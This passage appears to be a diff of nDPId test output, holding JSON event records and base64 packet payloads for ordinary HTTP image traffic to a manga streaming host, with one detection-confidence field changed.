k+uFym\/A3yclkZJ8EsWa66dmsk7IUIuXnp3apKNGJQGgbKfLFoWVWK9YsgIPRVOO75R7xDUz9q+\/wdhL6Bvp4iVjP\/YAR07vo9gAmjCQqesZTMhTVAMuXwlERPWl4wtpF0b5ylA4weK63l5VHHeTekepPlmM2ZPgEhPena+eVgrgDpDeBxLVpfjhJdh2pAkFl\/Itj9E+vplhUX79GInBhWr\/Rf6Tjy0aYfZr0bWyYSBA4lA\/R3m1Twy1xWEASJIZt7RakdMzwqSqsG9lO3ibhG4+RjlC4e4GdCGiyDQQToec08qlMrsb6jxurIYsIGEk0i7kTLCjGpt\/7opsmGBM18NONK6EMJiKHTtJSfE6GUrWpQuY5SLFCm6gA8oYUuWrxKHfQRd\/xxiqUOBihtPkSKSDaltV17NwQz36J\/hq7FSp7FqFWILEjYV11Cz4Q8VPxjhoJHSi13GdXpUqGm0GBbQeg63FDVhJQnw1kGtMib2Yf9xU\/2NEYFFK7LIAJAM2C\/v7UelbF21DXicOd67I3RYOxT1R0rQngFVKN0WCK5NYlT7XyG7Vg7YSWOnN7\/AUvIifx6LyicWi1MO\/4j\/tgTPePrYWavU05+b\/X0YGJw0tiFpwX9M80SUeMxuOtQyt
XsEqklHKltggwksPL2krZgWHjICBOqob2ykobwQ0UULykY9YgOW56Wme\/aLiUQFq0Q7CcJZ89xJ\/42FYJa5lXYH0P\/TM4DppbEtyPFNh\/67NoELB1LkZzEi9PSKyDlIw46NiRT+b8O5ewhbmvpaPcyjC4QGwhHZzbE41F12Gy\/a+cthlvd2qqfwaADTIaDQaJdI025YNkamWe4oPvNi3l6\/btVtWfpldldFiHyFKr1pGyZMk9EyWmCwq3P2mU8qw0zx4eaidYcuaF11F2nyih\/1jIDMAv6DecOtXXxaC9t22nVGRSN2I8zQDT9Yv+g6EKkg5IoICNkMCVyz92eHyfhPo7u23FiB\/HYWhItSJu930LbuZ16E7PJVHYerZwOmqZ\/vHjb4AV0+CE1EBQsVH\/i2r5kHBpovfS7O+8V08ldfPT9A3jWuRmId2jZeFrX0Y1jW9PPFq3kN\/8Ayx7DJya0qzksVuotjIrX0kEdictLzsbhV5\/0DRM7eZLpfc2JKjGndPrkLjiwchhqshbFfpzbxelwMx6zZvb7VmHdVgFsZB2ze7oFfvO81oB5QZJiUVbpxPx2JNOIx\/pUhvvI87IOIge9wOl382BYu3R4q7BkQ7nVP831IaIBxMgFCR7ue0QA5EdpeatlCYAih6CSKLm\/EIRwc3WEUYMdgE7QnPHHL087HqX\/nntbgbSfLUOAnAXQkrDsSI\/TSAxhBaBv4lWfhqaBNKqEQBg5aP\/h0Ai59KLBeMmkDbSqMKamByL5gQBIpRS9y4DrX\/1ERo9Ya59pxvDSpoLKXesALpxgN9RW16xMT7IlPWcBlscjLpFdFLypa5KLH+JTwfsacKE+sa45b49P3tnkUng6KPAvvPrEfY5j4Ds9+GkLoSbIbH5pITuii2U++Fgyh5URgBWDAKBXhsyZpFCAu8Ej+EFhSgesLmUb51pN1UQjHpHOpNKENl9i0RNhG6FXM1qXkmMu2OfRbi2cGhS3Uag2V3K3TnWZOyuwPzDfHVNY2hiKBItohKS2Toqg3LdwIX4ALpN6jwmMY1vJ5pN8xpvy8BhSbpE+drY\/Um26d\/568MLTQYvxke7bs6JitpSjGt4aTSaLzEFOAlJHpgrPvyGdkbKOopCOalf5VBHqUYEqNlCcQJZGcKuibaA+CKhOcASVH\/dVK\/LKcHrVhSKTaRPzOYsOR8cAZDnbAUwFggdNoyi5AiVdH7pYEQi563d4YRRkaDPChr2MwLzQE5Z2eygLLEUTjZauDGSZY2STnngf\/IFlcIvrZPeVh\/jylOHbUswONx8QlhfQYnnpy\/R85Na3DWMvwXLNBAqERWkZZKomQMIbQIRE0qyaS8pD\/S1iK2i0+KCh9nzrezGe2syhY9R0fJ\/XdWKevEaiI7kaqf1UefkR+nEV5Ton0W3N+LiNBqHq9gt0TY4ck8lB4MOrVIWh06NYI4dqR2XxG3d8UkPSyGsXZLY2DwVVGbGGG3rwPTBOXnxm94DBLqQATM9q5DPAAAx2DozZw5dByVWvjGoJA8EL9VQXQu1lEGLqJYNQyIVCkF6QW+5MjxYTioE4qtS8rNVnHqY4P21Cf03AxWuudr20+kG92517E9SQKKnas+QXUuGUrnpUjVl4By\/KUFnJ2+xdKCPpA+KrtUxlUnhmAvK7qpU\/U5QYVZWIgUVItSRUkOwG5PSUEUhbpCYjr6yl6lY88iNEysyPHFRS9YSqySI0eVc4rm8ImRTMH+ksOCPGH2De5Qn59KEuuVAecGPg2\/Mcddhn3Py+S8ulYnzyXMfE3XFNwHBvEiriFlv0XIjjwyA0r9hXwjK+aNKve2FnBMWar\/l13ISuiDDW9Wbg2B0b\/vKVaotaIqupOH3j6LXyhskiKT3XLI7kub+w00Rn3C\/2vUOopzgJn\/xBSioIUg8DQ8T8MFORO644OuC8Zg2RMpkd0tJgqM3LWCw3sxuSh6Vb4bnbfBDu
AymXSjn9qOspEuBCeA1Hnqk6Z7EQbzo0cy649zYnv2ti9ahEUhoAM6L1YzTESZlB15lVjy0qDCdjPm+\/hz\/W0kOxYPfdhaIMKTSj9xaVgzMeNpmM0S5rGQwr3gvyFZt1867yMXPHyrpdt1UNsFQKFZyfbkG32GuCiNPP1\/QS9MzblcB5bksx08NY02uG5jalIPOsl3bAejoidRCqbCltzBCzag4e7AV8mQbO9hTv9z3eezvEGVMUsgiRjtDYdjvfVGBECkbf0ru9ReTmeGO+XvPbgeh2Ytdam\/apmAzbSJi1xS8AmGJUoNBA\/uhYrOfNjLMBec+NJqM9y9hzTfVeV7g8deX08XKP6Wz1myxKm8StLXGSkGfZS4O8ue1F0t+84XKj+3ZDouQUimMXjbIfKPaQhrIbUMK0vNtEpl+VtmSV4maqKwSVJ7EKWx8mI97X35iYPD1tvVSsC+LuPG1sPdvVCWQAiSx5sPOhx+nY9D0WgWtXvsyxMmXXwsz5yDIIG9aKaobKMQUTL8bZhrsfxI8oD2agVb2nqUAjSKOh9zA\/9wytMaN25ANVHe3gBEJur2EU0X3hOY5ITCD6HlgNXujbF0w1pIHw20BLpqBwQEEkLcHAg4VHX4BErQ1dBihCwT\/2cz8UPavHA1vbsDMAzxL7HBUf8cyofB6qUwvEP4\/O8z3KDrPpiGvBX3vGX2DmaYPwalg\/6jfs0hNG48mzt8+KrQoPXg1DYsRhwUShkGdH18juAZnuezGG9WMvdB3335J6xvq5xPaNlLrnyvPE00KysWdfWJefGmFNb2PjVNQ4jPs4ADPpqCp5NS55LkgFbcWZeLdV54Km98\/nNOiq72XXX0hVCnoHf7x8MuDyH5Z99myGbQTEr28pbGOfPXI3Jc\/u6q48VW7Gf2nEAWjg3fhYvhsAxhuosw\/1EaG6p\/ZbJTxd6CN4JLT5seUTCi3M9JEJm0rqpM4PDjdjWIAgDQqDPY76K1vB2PLk1lvfOfzwYGVj3zOxWP0mFhNK94nD7N3RdWWhuPITS4+5DaaxXzX1CQvIHK3CFA7j\/mjof5K5e\/1VV5szNtlTZHK4KZbzNnrMdm\/VWJGF0BrOVYUt0Sbox8qJLr6\/GwQJMk6Qenqonnn0f\/MPHWKYj1T5qszcd6n99XKbhzvW6nsb5wfGdaVhsp0WI+f7oMOfujihusQHk42NzfeiHuuZye5bILBKJs43YVrDT4cJSW6dKJkyg2t0rrscPlPNCdX2lPQIvq7EnSH3ACRL20hMeltlKW6O5c7ChXj+Pz\/Eb+vmo0e3DNCUI9apyyp2e3PgufsUcIkO13EGoqcXkimky1tZgX\/9bmhoxlxxUD7MhwUa3BuDottTACLzOvV\/prJ82LaEy\/UQo153zPT+JiyiUiAubV5ORlTSfUKA0OMLpIIUp7cc4fTDsEA80uypKBtae4x0LEbe+n7ERSTiUt2rWa5b0en217CsosrDNp0yJJlyM50Y6SPOGqvMInpBnZCX4ar7m7Zn4pvvNMmY4zwvG2KltKcdpuRZoVaWabSaRpQFcZCpDOa0fDb76nxwiIzH9mK2mlJ2VXZ35a2mmQVjdIfHxQAD20lwC9v9NtkfHuvd5D1Zomk4+i3C4WCanyKbxgGWu9ey2RAtqmKIAodDCCQCPfDkDQXsrdCM\/GdiC8RaY\/PlhKudY7Hsg9Dkvri1jMKoPWaTG0EQTLgPENU4tW5db8rawHN6ag0I37KiQuV7bX4Us+KYD\/G0wjqbsc0MNgE5TopN83GfdbMHM47m8xslieKIeWwh2yhJ0oDDe+ycS5D3yGepy2vgQj7gcZPpNZzHI8dW1I9\/d2z12KhcP1EFKOVbJ3C+agb7xgmovXLvnNR5ve1uu\/2B3sHt1h20WuMptiUGSKyUWmXjED5ECXcUOtBUk52E67\/Fcp\/1WVIMkNx8FYoRMsHmOR67K+ptMDhks2raXq6u0EV
RyUNZ31hfwA9d2f5gfWL7BCev\/xhVW7Vc7Row0PSNajmpiuzsVqnaCAIZY9M70CrsgZ3vtmFqVaU89UJD7q4n6Pu9YGh4K9SDiG1gY0EG4QWHI6lp9FpFfXNvA8Db2MG7aAkeQ1nZaljfPy4SPh6KU\/ocbwtWf0JnzPYS+CU1qKrnG1G4Qo+UzoAWIIORIsCHCthQaxukg3CAu5XzfhZtc3nRZS9IUtvQORxhZ+HSpozkqS5VLdbWAOlsWGIGpkEmQOT4VSvcv8Scw3nEnf5f57Mckwfcv\/48CL9BxG2tl9S5im9NV0esQBS4x4GlPGhzmBLibFPumvGL0AoFt844Lbo7iayKSyKSGH4rNVBladJTlmIwV5N5wMjROgBK\/85+vHqE3VUGS6njvdkSBSy987XyMa161au6wYLeBOKQeGotUtQS0Ln52T9ESjQDQU89uoKDcxpbDZx3cEZSkiDymkaUkQAKRrkFrvO7l21XPFy1VRYVBGst0rDU\/XllzzY\/0y6OEd7cx9YYlrYJfcA\/HalWy2e+\/NJQZ0jg2hXvDZSj"} -01041{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1851,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1654385146276,"flow_last_seen":1654385146472,"flow_idle_time":7580000,"flow_min_l4_payload_len":526,"flow_max_l4_payload_len":10080,"flow_tot_l4_payload_len":12046,"flow_avg_l4_payload_len":4015,"midstream":1,"thread_ts_msec":1654385146472,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"14.136.136.108","src_port":49412,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"hkbn.content.1kxun.com","url":"hkbn.content.1kxun.com\/manga-hant\/images\/project\/cartoons\/13aeb81a47e7632ccdf1aefee19ea65e.jpg?format=webp","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 
+01041{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1851,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1654385146276,"flow_last_seen":1654385146472,"flow_idle_time":7580000,"flow_min_l4_payload_len":526,"flow_max_l4_payload_len":10080,"flow_tot_l4_payload_len":12046,"flow_avg_l4_payload_len":4015,"midstream":1,"thread_ts_msec":1654385146472,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"14.136.136.108","src_port":49412,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"hkbn.content.1kxun.com","url":"hkbn.content.1kxun.com\/manga-hant\/images\/project\/cartoons\/13aeb81a47e7632ccdf1aefee19ea65e.jpg?format=webp","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 00850{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1852,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":159,"flow_packet_id":2,"flow_last_seen":1654385146479,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":351,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":351,"pkt_l4_len":317,"thread_ts_msec":1654385146479,"pkt":"nLbQ0+MztKXvZygQCABFAAFRPDZAADYGrVYOiIhswKgCfgBQwNqXNB4kXP6K3IAYAHppHQAAAQEICpoJIhseulbsSFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG9wZW5yZXN0eS8xLjkuNy40DQpEYXRlOiBTYXQsIDA0IEp1biAyMDIyIDIzOjI1OjQ2IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9qcGVnDQpDb250ZW50LUxlbmd0aDogNTQ0MTgNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2Vzcy1Db250cm9sLUFsbG93LU9yaWdpbjogKg0KQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0yNTkyMDAwLCBtdXN0LXJldmFsaWRhdGUNCkV0YWc6IDNmOWUxOTYyZTc1MjM2YmQwNDQwOGVlMDFjMWM3NGI4ZjRiYTJkM2MNCg0K"} 
02408{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1853,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":159,"flow_packet_id":3,"flow_last_seen":1654385146479,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":1654385146479,"pkt":"nLbQ0+MztKXvZygQCABFAAXUPDhAADYGqNEOiIhswKgCfgBQwNqXNCThXP6K3IAQAHoH\/gAAAQEICpoJIhseulbs2EQnm3dW5NpHc5sR6zYFLkK0FMFEDWcY52F66EPzn3fkt+HTn9roK+1oYu+87d3Fe6e2hB4Cv0dyvGXqZhzGtjaFIs1sqpNyDme\/d2VPz2vgTvzWfwec81SNc+Xq93Fp2AYKjQ\/ONTs7l2xm6I4Pj13c9pp5szRNcue+WfKu5GqQ3MZhEWBRdWFdKLrXGxOuP5rY8yyeq1vEsI+\/6PJc2c7uZO7u25ZgAbqjvOgcMfmLD2RvIehRt9zwnpsrh7QVlOnnAwWV1o9PWHVgIvCIIypR5+xplafVx851crHU7Ea+l0Kcs1DTz0toDnI1EZdW9zy2zN2PNbCLAGtcc6OLhflSFbHBw\/EfUPBUQLNIU+pdqaFjsZhKyfASWUPGCDSkqpTxGb7HxvVJ\/ZQHz2Mg0mH9On5j6AZ5bvoZxwML3kjfOp9j5QMpzGudiU2oIzt7zHpLy0CqktzO9XlzYh5XP165QEpygV60+0i+ovXlzhktabSr+BLben4fcleuk9A0TPDR85+i\/OWzjvoIZZv1ee8iZXVqNDFto1RI6QvTRdY+afTvL1TPRbW5+npW9yV7XVZadevGNbdbbs+emxG8+NnhLD2wmPVBqiS7o+iDHU4KUHLSpaadedoIGHcdhNCnHr5Mq7QmaDlKnWx9235r0vPWIt23fO\/ongWHoNfxHt6JNqXUqlcTk9OqwlEwP5k6H1swNo0xYsXz9Xb0mkBY1nn3CLOzFaZuOz09ppC0hK4L0bIAxwipq5uliADq7KlzXOqXFC6Xq6mc7l1WXNDVZOHFxlq0keNc3QXJa9n8\/wDfc1C93Ze8R7fxx3lPp3y31dB67u7KQ6l1xVXeQ56hfFZvXUr6INkuNCeRFBu7ULwxgpEI+ZUis7aPCVCmWraNjWRvtxWiUnBFQsmgredu6OR16iN0w7P08TUt1hNCq51iWhAuW4XUzdSaEg9x43Wg\/qpGSY7y3qc4j5hr2+hPlzAKBbp51NamSm8O3kbrnU9RhEhXUWq7fnKNcWzAamIoQ6gMJOL5+ntXl6Mke0PBGryysK0yCyzmivLYSTHWLvIdtpXBnBNDIGVk4cDduEV7NgNCXZmaTQt0dXaR2qN67X8L67jq6tDBnUdclXcvc+1+TerLsVtWq+N9QbVnTJEypzXtpIudPOXptSUuWtJwpko62V0M8kj6TMa3kRVMUrcHlm0WZGk9dSXDq04+57oUwqWsvULP0s2nHAurQiaFQvGc8EklVzkxFVxmY6Nh+r8x7WJ0AMxHUuCmJRSRW8\/6EXnWD+mA95DL3c\/QLIfVVmmyMV58crVlchFCtNQ6OtRaZ2mgCcTqcqFJwlabxIPCLiMKROn181NYOVF9jvnXE+ptWkvSdwN3Cr54+GWsqgtRm6swWSaXMNybi+xupbFn3nn\/AEfNomOTd0hxlW7Cstn6+ODpj896OqCuC0uuzS+g\/PAyqmZDKMsFoNlJR97AHn308fRpLZTqrLOVHdKkmJK9869Z4OoH6zyJaJ7
HAHLgvU471Uwzy+gJDbWfkxw6eZfnmmhtTv4+NTJskLNJ4OqnS2Kem6p9Mbu5tFeuD3RG0pjKjjs3Zl8B6lzzrnYtxloY9KNAy3VxtW1WA6N9OqlijV1ysABVaCWZLeklCLl+f0kooetds5fqlCmTOvl01ONx3tGKF5rG836bApDUyPQ52GR6jyHrS4cttOfTgJes8z081EikwP7jzHtJHu7p7u7tozWvCLT3FkHkZmwi0lyzPHK3JQi4mBqQ8bgyhamx7u4hNyIxEIwVrSgoV3xrLBFvHnBeXp1YCF0vU+N+gsnhNI2li71elosslRdE\/jfSNtEZuXfPfWeTTsfWAzGZdm75bUWfnyM3a1Wnq6kWie7uG4cro+R5loHRh+9+f6yb1xg3jlW1iubTHPO9Z6bS"} 00850{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1857,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":162,"flow_packet_id":2,"flow_last_seen":1654385146496,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":351,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":351,"pkt_l4_len":317,"thread_ts_msec":1654385146496,"pkt":"nLbQ0+MztKXvZygQCABFAAFRYcVAADYGh8cOiIhswKgCfgBQwPQgi0PiRUrd7oAYAHrBxAAAAQEICpoJIiweulcCSFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG9wZW5yZXN0eS8xLjkuNy40DQpEYXRlOiBTYXQsIDA0IEp1biAyMDIyIDIzOjI1OjQ2IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS93ZWJwDQpDb250ZW50LUxlbmd0aDogMzE4NjANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2Vzcy1Db250cm9sLUFsbG93LU9yaWdpbjogKg0KQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0yNTkyMDAwLCBtdXN0LXJldmFsaWRhdGUNCkV0YWc6IDgwOGFlMjgyYzI3NjI2ZDJlYjYxMDFjZWZhZmFlNzZhMGEzODM4ZGMNCg0K"} 
02439{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1858,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":162,"flow_packet_id":3,"flow_last_seen":1654385146496,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":1654385146496,"pkt":"nLbQ0+MztKXvZygQCABFAAXUYcZAADYGg0MOiIhswKgCfgBQwPQgi0T\/RUrd7oAQAHpAqQAAAQEICpoJIiweulcCUklGRmx8AABXRUJQVlA4IGB8AAAw8AGdASqyAToCPm0wlEckIqIlKHKcYKANiWNuVSIOIssgku+u81XoBT3\/LeIyrp+8Q\/bpO+8rjk\/xq4H88\/fn2953j3vqG59Hq7\/5fPx9LX1a\/pD+bV55ntZ5hh5IvnfX7+c\/c\/8P1rP3XLv2o6l\/0H9EaBP87wb\/X\/6\/0EfeXqUQuPOlBXdRfkeff259gb82PYj\/xePv+Z\/53sHf1H\/M\/tn7xP+r5tP2b\/d+xp+yW\/UiY3RZLtT4MDGKDY81TAVspXTXDGXJa4s3dqytWghww8+TNyimg4UhGjtsAotyww4+R1YOB4C3dEUzv+s4TEyPqA7x2vP9UTSksd8ePwx1tvpkwm614cdoaVp1QQDkBCDyIaWExv18Hup+j74D\/qcAJQqC3jkpSy4Z7CSIqzQIoGRKCjGFp22u5gDkFqhyWEs5LntkSFZUEYYl7xDYtcp7nnqWGUQ9HCZdQmHhhrz5YRzncbST\/+yT+eno9CC+VrV57objw7X\/SrCJu\/BerO1FzWUkmLuqSNvnfuWGFmopHdwfOY84vg0qB9m+JxMcHe3JxGc5t06QmWwfn09phXcGI5NAcK\/btASrGvy8IpSsAvqM9\/9UfMuXqsKUIjb77lqUcje3tSNNbWSZISltxD7ruU4YF8hb9Yt+vuLwaDRQQ4e7A+3CwRNGn4UXvE6+KFf\/NcHY1PyUkUBxVLg20R7WsBr8g6rE7PO+Kei8XAxBW\/YUwEPaw5lBxgrppGH+lMXLhNVOllXzji+Z6vK6hsy3mBGxXB3XA4pJFyyu3s\/jjl3tfE2xMp5VWOyeqECqPGil5RN+bBEV5mjoXObZTRrZWSDClKh71TpKVlzsQ6WG6OPmeXbXYu8STlKtzrFTTU97zYa+UVTXXGuoNoRILHttFFQuA88IJn3aHlRUuva8bpaaf49mg\/pcfHs1cS6eQpYuDfSM11V0iYSx\/8J+7gaf2eLfitKqY0uCur+v3Q98noUFVzpZ17vnl+eBYzbIBj9CAuLeI9ilkbjN2W4axFNIVbypMrTV+W4XeWy74QfKbfVfCT4a6uHCjjp8hStUbSdfeOpfF\/uiFI84ec0Lftonn80FSgzvOOHCA1x35rp+b3CZd7+oPkgkPPxCSpMgBW2\/KJIR305i6hCMUURb7dJyRBqKBUUSG7yT1a1fwYZLQL80RIud6Mv8xjp+v\/4+o\/ONJTv3zBlmqx8SK66adRQtwZM99p5WBLwOsel68J6NmAEP+J1WKzpmZGycpaCvnUTAck\/jb+H5EgNpZFNgVaLNdbIPdDbOG1GdKyhsxyKKu3zcaNOqkcCNQrkPcARlDwFI2ETeB8aNim7pYnvFBIqQlFKNUvTB3RVCljRTwmhmiAfQr7QaRy4m74V+0BH1yTzwEVs\/B3+ReNLhBCIhBkVuDZ3h6hKHuc4RJ+pdzkFHYGG\/sUcHHGYSaXewsKtOKCSImqlkrjCY
kMM0mRTUYqMwE4FZvxRR7Uw55Rf6J\/LncYrxeVIzO5qqcWdOCvcY\/6lm9f4jfTcqx4uvW\/mbQa\/thy1EZlJzgCptXr3VMlLGPEhyncvOuHbKKuXh\/1638vWC4LD3vqLLbaqQR9aoqr2BxhZqsOCU6gEF5Wdb5K8v42QXu6pttbAhAlmLv\/S4aTCnvcPXNsXpU8dhmUkG1oXmXN+msw0mWxcBUseZIah0EwQnaeNuPtc2KI9L9Nb9o4wgxomHRbgDLmqdw6wHVtAfsbwarEfN\/l6Ziq4eSzOtTp81C0wsrJqH6Th4RljhYKfwHbOtC0y5nuH8WZQ2moUdoTIYJJm62\/zSeC3f3w2kqXdhwUbG+qjZbmQMNfzYgv5eXnSXpck4Hrlz2yZuj9VIG+WV8wirBwSp\/mb+7nb4su6das4eYvNOUaSf"} 04379{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1860,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":160,"flow_packet_id":2,"flow_last_seen":1654385146500,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":2946,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2946,"pkt_l4_len":2912,"thread_ts_msec":1654385146500,"pkt":"nLbQ0+MztKXvZygQCABFAAt0gVJAADYGXhcOiIhswKgCfgBQwORvtMvRImpQ7oAQAHplgQAAAQEICpoJIiweulb6+ZKcD+KnwfgPmxIli1SDP0WB+TC+gZ2zUZ1MJYnOEnfgrEfocekJHaOM+Eztu22jDjbrklrlhsLXwktGW5jFzoZr3Ytu7HRoxyemV6NLVS1v4GRaLHUchrowoMimCyOxZHfNMnA0GNdZ10WtBsw4gEq8H4X8y8f3\/RYH5Mn6eEzqjI8sPaA+ORFtFcdQ+TmjpdZPUsTpyl+nLhU\/9GpHgFqC51W1e7CLdEBDq\/FQ2WwcSw4ZRTbi\/WGpayOUjE4QZtyN0YXULC8rCWHS4N1MsqhVl2K8H4X8y8f3wgnA\/Jk\/Twlux8TrGuEW5nLXTDPqGMQAlYiMJpFjD2haZrB7TzXXPMjVOcqB6d6igpIOmaJ7Y0Mrz2\/yEfvD5pWGi27w9bKORzLvk9ue8s4aiSRSmdLv8x2K8H4X8y8R8w82CiFh+T6YwGSptZ8TjC0FXdnJzdcE9uEyZwnCOep1wtTzpxjxgEqVLJABXHJLpS3bD6ip0PC8K7M\/yCNVfrglIVQ4OuF2gykfOcPmMbjrz6bh1RnUy5\/MdivB+F\/MvEfOMae6F\/kz9fTSf9smb1on3k+Iw7BNmS0w7MRktM8Ff0Xj9teNF8yzhLN9Jw6SBbhxxSs+M6O4bTT17SVdMQjaF+od5bknXbynCwEsZiOD2GyrhdKmNjvU4f8AG3\/MdivB+KdZllzOEugJUa2YWL\/J9aj6bQ3CMt2YfYZsFk7yyBnI7ZuzfktnJM8b72B45z44I7RsxuiJlZCW6LUdmRB1qCOgwTgI1k8kxEblTVuyjGQPDs14YOevoKw+ODo3i1ks4XE2bddW9CQgJt\/y3Yrwfjg64GjfvwiDex7cLF\/kwZyfP0quvVEcRYOMIYp5ETODXaWekEYIkDknM53nDjYsO5h8fopHtsi3VbhwS0xs7wlfY7RrfW4ggHRM4TVKy\/xlLF9ZudYs668Jlec31c3Uc4T6djHl6evUbLRtfynYrLT6x1eC2dIZO6R+eFivyZGSOkc21mpHBAjzTIn\/AMSAFqMsjPuzkhyEJLBGBy8WixGRGPj9CZ0fSPWNduT2zXAX
Bq4nWNVvTCfY2zMzKo93KeUCRF6QE5wqyJvtTuTQGRGx\/JdivB+EzowvA\/kwsD5ctdc9OWzlwbY\/hrOD0Tni7E1kzleJbw9c6TkztjQ2kFPTJ85GkJslvP6P0PmszQmBvhmsCpmV\/h5i\/wAKrtF9NiRwGbcho55wUuZm1QZNpkDtIp4QJBZux9ivGin\/AJ3YrwfhExDC8D+TCwO8xwl0xEbplWQ+OiXecqXG0mM\/yC0Q1JW27xCupVnhwyNdqtGTB6hU1mIgYa3XkU6RaOBRM7p+gp7ZXnVVY96yCCx1XTFmQz6loZ6wCyJiCZwo+r6JMZNRGntVDWuYW4s1nNM4YzptecOUlfSFv5XYrwfiqxYSXgfnnDK29jq6xf15wB2wMYa4OCHbMRrmnJUYKd0pn3uDcKWa8mN5mWssYXS+kp75S0NFRuwhKCjGq0wy2w+2tc6xMcQnczdpgsyJ1yC7ORsHTkidr6jFgpD+vB\/kdivG2SwV7JLwHzQgnsSsQF+zT0zOQjjEMVjw1haSkSCIifKvKC3mj5Y0dhyZTzYXaZ7OnSY+nXWc6hLZVtLsn02hItxp6DxJvpBmdcW05ScHryidMCdwrPYVhHQPlWZqvh\/wL5OxXhXaTPVs5T4eTzWpdZai96\/dJXUiQ+eG1NuMULl2+GOXFVBmq1wm1t\/e7SKgbUIjtjB3B5nYWMiVDAyzGQARrrMR25zOkcj8wWkqvOVKuOPHP92npNYb2SGVWylvqJyWCWEusWTUQWLpMWbUEJpj1Nflwp2yKgEK58uzhHT6ziEWLnUyjSKtpinmyDXPhX5PSLmemNZ4TvLZtjYws1JcAW4uOUNJUomsWOsxoMaFkbJg5iIk8I9Qh4CFtmqo7zGeZ07Yc9uR8tMiJ+iY7hvIdWRnXLIsDkMHOvOm4d1lQ6yBacLn\/orawufLsV4Pwr5HPbhlxHpzGGCPYCVM5Dw0dMy7hb4EQKWREd\/lAFhbTj\/UlXsoXgqgc4iw4YZo6D7\/AH9QZYAKLGGAZan3j45a8jnvynzGRGn1V3dPItxhFUZnpBLJE0yLhzcOf\/QMCqI2VfjnHYvwfhXkvC\/moyXHqNcWyJH25Z4YBlXpwghd3It+SbIacSD9e5DuGB1I\/DDh1lrQkmTqSUkyJMYzTc0y6jfonJ7ly\/Y\/VPhfyyMGJmatA2IvCpBymdETpKz96fyI\/FjcV4OOyvkfhfyEdy5jIORz1i8EoITTMYZ++bEgYTuztmvYygA7dR4nKdPs\/wDw0zq\/aH2p3aQOLIQwz3nymfojI7R9AnHTPwgdx6HpPmI1WJQYXYkr1QJ6s93qGc3elCtP\/NjcX4Key\/kfiJ2zWsxhaGBeJ8o1WRRM5K9W+m7jArmsyWkPuY37mAexVQ5kXU0Ol\/C2LyFCUzUZEJPolcISMZ2\/RM6RPx5TkZHn6TnvSASnpryIVGEDnZWtFSC8xDZDqFgVsUvbDHCziMaQj9Nxfg\/CvJ+P1lewWpC+M\/6sCZkNcauJgI3w0ZNgAKljG0gDaLZnelnTaUaZvIcuELkDXrEtlHTJncf0T3k\/lzjyHnlrymdCnzSWEJ3AMzYkcVaIbDRK45dYBywMMGsuRy5a9HTpTo1ha148OjF+D8K8lm2cIcjAcwV+pXyCd2XLPUJYmwhjbBnuKA05Wo0dldu4Sx0blik+naLpoHxzmdIpJ61iOCVdZ4HTyeBVMZwOsIWKAKWPj6DwI1OnG2rOwsuJEcMIlkyzWETOFTgxYxYBbtHcsVZ++f8AFjw7F+D8K8zyPyCuqyFFt9OvAg2TduQkFnrFRwADHEUV5jbjLYDJbmFI8hZ1YLvFVu5HHJ2iPjmU6zSWYwsrW2WWBiD\/AOcmnOWY0r\/r6D8VQ3sSDZj08TLkwL+ipeK+PjCfGziF0rbMrfyi\/h\/puL8Hge2dYnJnTBEjKtW6C9YmNcmRAGx1Y4ZIQ+Ggc9HrT7Vi5k
